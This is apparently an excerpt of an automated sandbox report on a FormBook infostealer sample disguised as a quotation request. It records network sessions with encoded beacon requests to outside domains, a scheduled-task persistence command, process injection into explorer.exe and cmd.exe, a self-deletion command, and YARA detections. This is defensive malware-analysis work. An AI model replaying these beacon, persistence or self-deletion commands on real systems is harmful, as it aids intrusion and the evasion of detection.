64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75
                                                                                              Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              5192.168.2.549743194.9.94.8580C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 23, 2021 09:40:03.483678102 CET11787OUTGET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1
                                                                                              Host: www.dorteklarskov.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 23, 2021 09:40:03.546607018 CET11788INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 23 Feb 2021 08:40:03 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/7.4.3
                                                                                              Data Raw: 31 37 38 34 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0a 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64 3d 27 2b 69 2b 64 6c 3b 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6a 2c 66 29 3b 0a 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 64 61 74 61 4c 61 79 65 72 27 2c 27 47 54 4d 2d 4e 50 33 4d 46 53 4b 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 09 09 09 09 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 44 47 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6c 6f 6f 70 69 61 2d 74 65 73 74 22 20 63 6f 6e 74 65 6e 74 3d 22 58 73 64 58 41 49 78 68 61 38 71 39 58 6a 61 6d 63 6b 34 48 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 36 33 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 2e 73 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 35 37 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 33 32 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 2e 73 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74
                                                                                              Data Ascii: 1784<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 132dpi)" href="https://static.loopia.se/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolut


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              6192.168.2.549744194.59.164.3480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Feb 23, 2021 09:40:09.038458109 CET11794OUTGET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1
                                                                                              Host: www.gurumanindustries.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Feb 23, 2021 09:40:09.429874897 CET11796INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Last-Modified: Tue, 25 Jun 2019 07:07:21 GMT
                                                                                              Etag: "999-5d11c829-c5eb53afe31087fb;;;"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2457
                                                                                              Date: Tue, 23 Feb 2021 08:40:09 GMT
                                                                                              Server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some


                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              Analysis Process: Quotation Reques.exe PID: 6476 Parent PID: 5700

                                                                                              General

                                                                                              Start time:09:38:09
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\user\Desktop\Quotation Reques.exe'
                                                                                              Imagebase:0x90000
                                                                                              File size:549376 bytes
                                                                                              MD5 hash:5A752FCD71ACB65C618A829610B7B7E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.252016521.00000000025CB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:low

                                                                                              Analysis Process: schtasks.exe PID: 6744 Parent PID: 6476

                                                                                              General

                                                                                              Start time:09:38:20
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
                                                                                              Imagebase:0x1190000
                                                                                              File size:185856 bytes
                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Analysis Process: conhost.exe PID: 6752 Parent PID: 6744

                                                                                              General

                                                                                              Start time:09:38:20
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Analysis Process: Quotation Reques.exe PID: 6788 Parent PID: 6476

                                                                                              General

                                                                                              Start time:09:38:21
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              Imagebase:0x660000
                                                                                              File size:549376 bytes
                                                                                              MD5 hash:5A752FCD71ACB65C618A829610B7B7E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:low

                                                                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 6788

                                                                                              General

                                                                                              Start time:09:38:23
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:
                                                                                              Imagebase:0x7ff693d90000
                                                                                              File size:3933184 bytes
                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Analysis Process: cmd.exe PID: 6776 Parent PID: 3472

                                                                                              General

                                                                                              Start time:09:38:39
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                              Imagebase:0x380000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:high

                                                                                              Analysis Process: cmd.exe PID: 7080 Parent PID: 6776

                                                                                              General

                                                                                              Start time:09:38:44
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/c del 'C:\Users\user\Desktop\Quotation Reques.exe'
                                                                                              Imagebase:0x380000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Analysis Process: conhost.exe PID: 6896 Parent PID: 7080

                                                                                              General

                                                                                              Start time:09:38:45
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7ecfc0000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >